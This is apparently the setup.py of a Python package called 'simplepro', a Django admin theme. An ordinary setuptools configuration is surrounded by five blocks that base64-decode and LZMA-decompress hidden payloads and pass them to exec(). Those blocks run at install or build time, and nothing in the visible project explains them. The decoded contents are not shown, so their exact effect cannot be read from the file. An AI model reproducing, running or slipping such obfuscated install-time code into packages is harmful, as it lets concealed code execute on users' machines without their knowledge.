import lzma,base64
exec(lzma.decompress(base64.b64decode(b'/Td6WFoAAATm1rRGAgAhARYAAAB0L+Wj4AJ5ASVdADMciiJvqr3ebfmDOCJFKOrZohcuR2RQYpldjmL3y/1yiUPYFNRrgfnix1kbpGzgrAOaZMqsZOZd6N7lOfFTtQjoob1mxsxQ1HAi2p5y/SV7DqeoKHxk7uO+k25DVUxMoYP2Pg1ffN7zcvA1S5FJ7Z8ByTxg0O//WfVgT0GPtAfP1CXrai2AgQvMguqV27ZDLCd5N3DdQyorrIUsLEU736a/WgSraEWq0f+KRVAVttxjdFBC2iUDoYCvGJae827JPj4+ygxQ6DzWZSmKBmSlQsqUG+o1bN5llIYcbHeNXNzc2J/hGWnirapE2VICUuCBA+2DZ+VU+lLyG7J6Gipy4kkjNWWxRYf+xYwuOcy+67YKXTMNaxBl+ch1CmF5q2bmY1+l7ZXAAAAAAJzh5jMzB+5SAAHBAvoEAACzFPONscRn+wIAAAAABFla')))


import lzma,base64
exec(lzma.decompress(base64.b64decode(b'/Td6WFoAAATm1rRGAgAhARYAAAB0L+Wj4ABXAFJdADIZSQQyDRF6hiPekxUzIOHMyaY7FteYcGlsJMtIp5Kv39WoFMFdCFhPL1crRt3iBqCW05stlfP0pD7AoQ8a0YjpER61YKZTlHP0Tz5db9qaGNkAAABNoO45xzQ0RwABbljEKki+H7bzfQEAAAAABFla')))


import lzma,base64
exec(lzma.decompress(base64.b64decode(b'/Td6WFoAAATm1rRGAgAhARYAAAB0L+Wj4AEwAL5dADMciiJvqlzh/FMS3SwNVnRrZ7XT+J99DSntDijcny/D2PC5AYcpvek/pTq4C+xnWRBf8e4oKgWLkzNCwF18rcG+USWhJeFaZ5H29a/ymfH4JieybxcXVA30WbVyiZdNDoL9RYLQUL6fy/O/3uClCEb1NAF2iMvIR3wHFIY6zB51EcCz52pxP5FOk853gSEiDTWgDfGyM9OmN+nzlpGqOEshPk5und0EWUZBWGFEBnXA1DAwRPpBZKoUKswNJCAAAAC3vwvmg958WwAB2gGxAgAAtT/a67HEZ/sCAAAAAARZWg==')))


# -*- coding: utf-8 -*-
import sys

from setuptools import setup
import simplepro

if sys.version_info < (3, 0):

    long_description = "\n".join([
        open('README.rst', 'r').read(),
    ])
else:
    long_description = "\n".join([
        open('README.rst', 'r', encoding='utf-8').read(),
    ])

# 如果是Windows，就安装wmi和pywin32模块


requires = ['django>=2.1', 'django-simpleui>=2021.6.1', 'django-import-export', 'requests', 'rsa', 'psutil']

# if sys.platform == 'win32':
#     requires.append('pywin32')
#     requires.append('wmi')

setup(
    name='simplepro',
    version=simplepro.get_version(),
    packages=['simplepro'],
    zip_safe=False,
    include_package_data=True,
    url='https://github.com/newpanjing/simpleui',
    license='Apache License 2.0',
    author='panjing',
    long_description=long_description,
    author_email='newpanjing@icloud.com',
    description='django admin theme 后台模板',
    install_requires=requires,
    classifiers=[
        "Programming Language :: Python :: 3",
        "Operating System :: OS Independent",
    ],
)



import lzma,base64
exec(lzma.decompress(base64.b64decode(b'/Td6WFoAAATm1rRGAgAhARYAAAB0L+Wj4AFhAOVdADMciiJvqlzh/FMS3SwZ+nQSa6H36gsLbA+rHUCOsyIRHODDQwXl44OqCJdEynRCq3+HnPJ7fECiJm94X12/oxuSXGbhU7b0b/xRA9tXLSjkVFyFwvd67yhT86ngSkSz1vTH+llTfasA7jEzbJi/bXSWlFj0mutLCOGnkYepZgBIgkkX54GHax5x+gPVGooIOWpSq55NbhmUdrob09bwSYF43kC3BW60BXk76Is3jr9ZaNMyHx6FlvXxEINvcHNm+mUjDYFRw97xaAwo6gvwWtqIqb5AgsJE6zseBTrUGH6n8xbPIAAAAAAA034A4R40AtYAAYEC4gIAAB0dixOxxGf7AgAAAAAEWVo=')))


import lzma,base64
exec(lzma.decompress(base64.b64decode(b'/Td6WFoAAATm1rRGAgAhARYAAAB0L+Wj4AE8ALxdADIZSP9PCm8uEnWszOKJb7ahWBcNvHuyuXuUfe8kv+b3EqJwLyAnaVm3fBjrGdTg+JalHFCq5RhjBP3jPifgN+kG3S/uVQBr4gjdNlewNb4N2CiaSdjJclXPjkp2rYYo229mu1Z27aeyZ5U4tk4DJdWDtlIS/JBkFBKRSnTVyQuFXVS/sKeCamiM6DnF7te5f0WLnUl2rdDyHnYVVPqNMBBorBkGGrb70Y6JtJysoyv6lohaEaaHDw7AzKQAANRqTamyMQJAAAHYAb0CAAAGIcTsscRn+wIAAAAABFla')))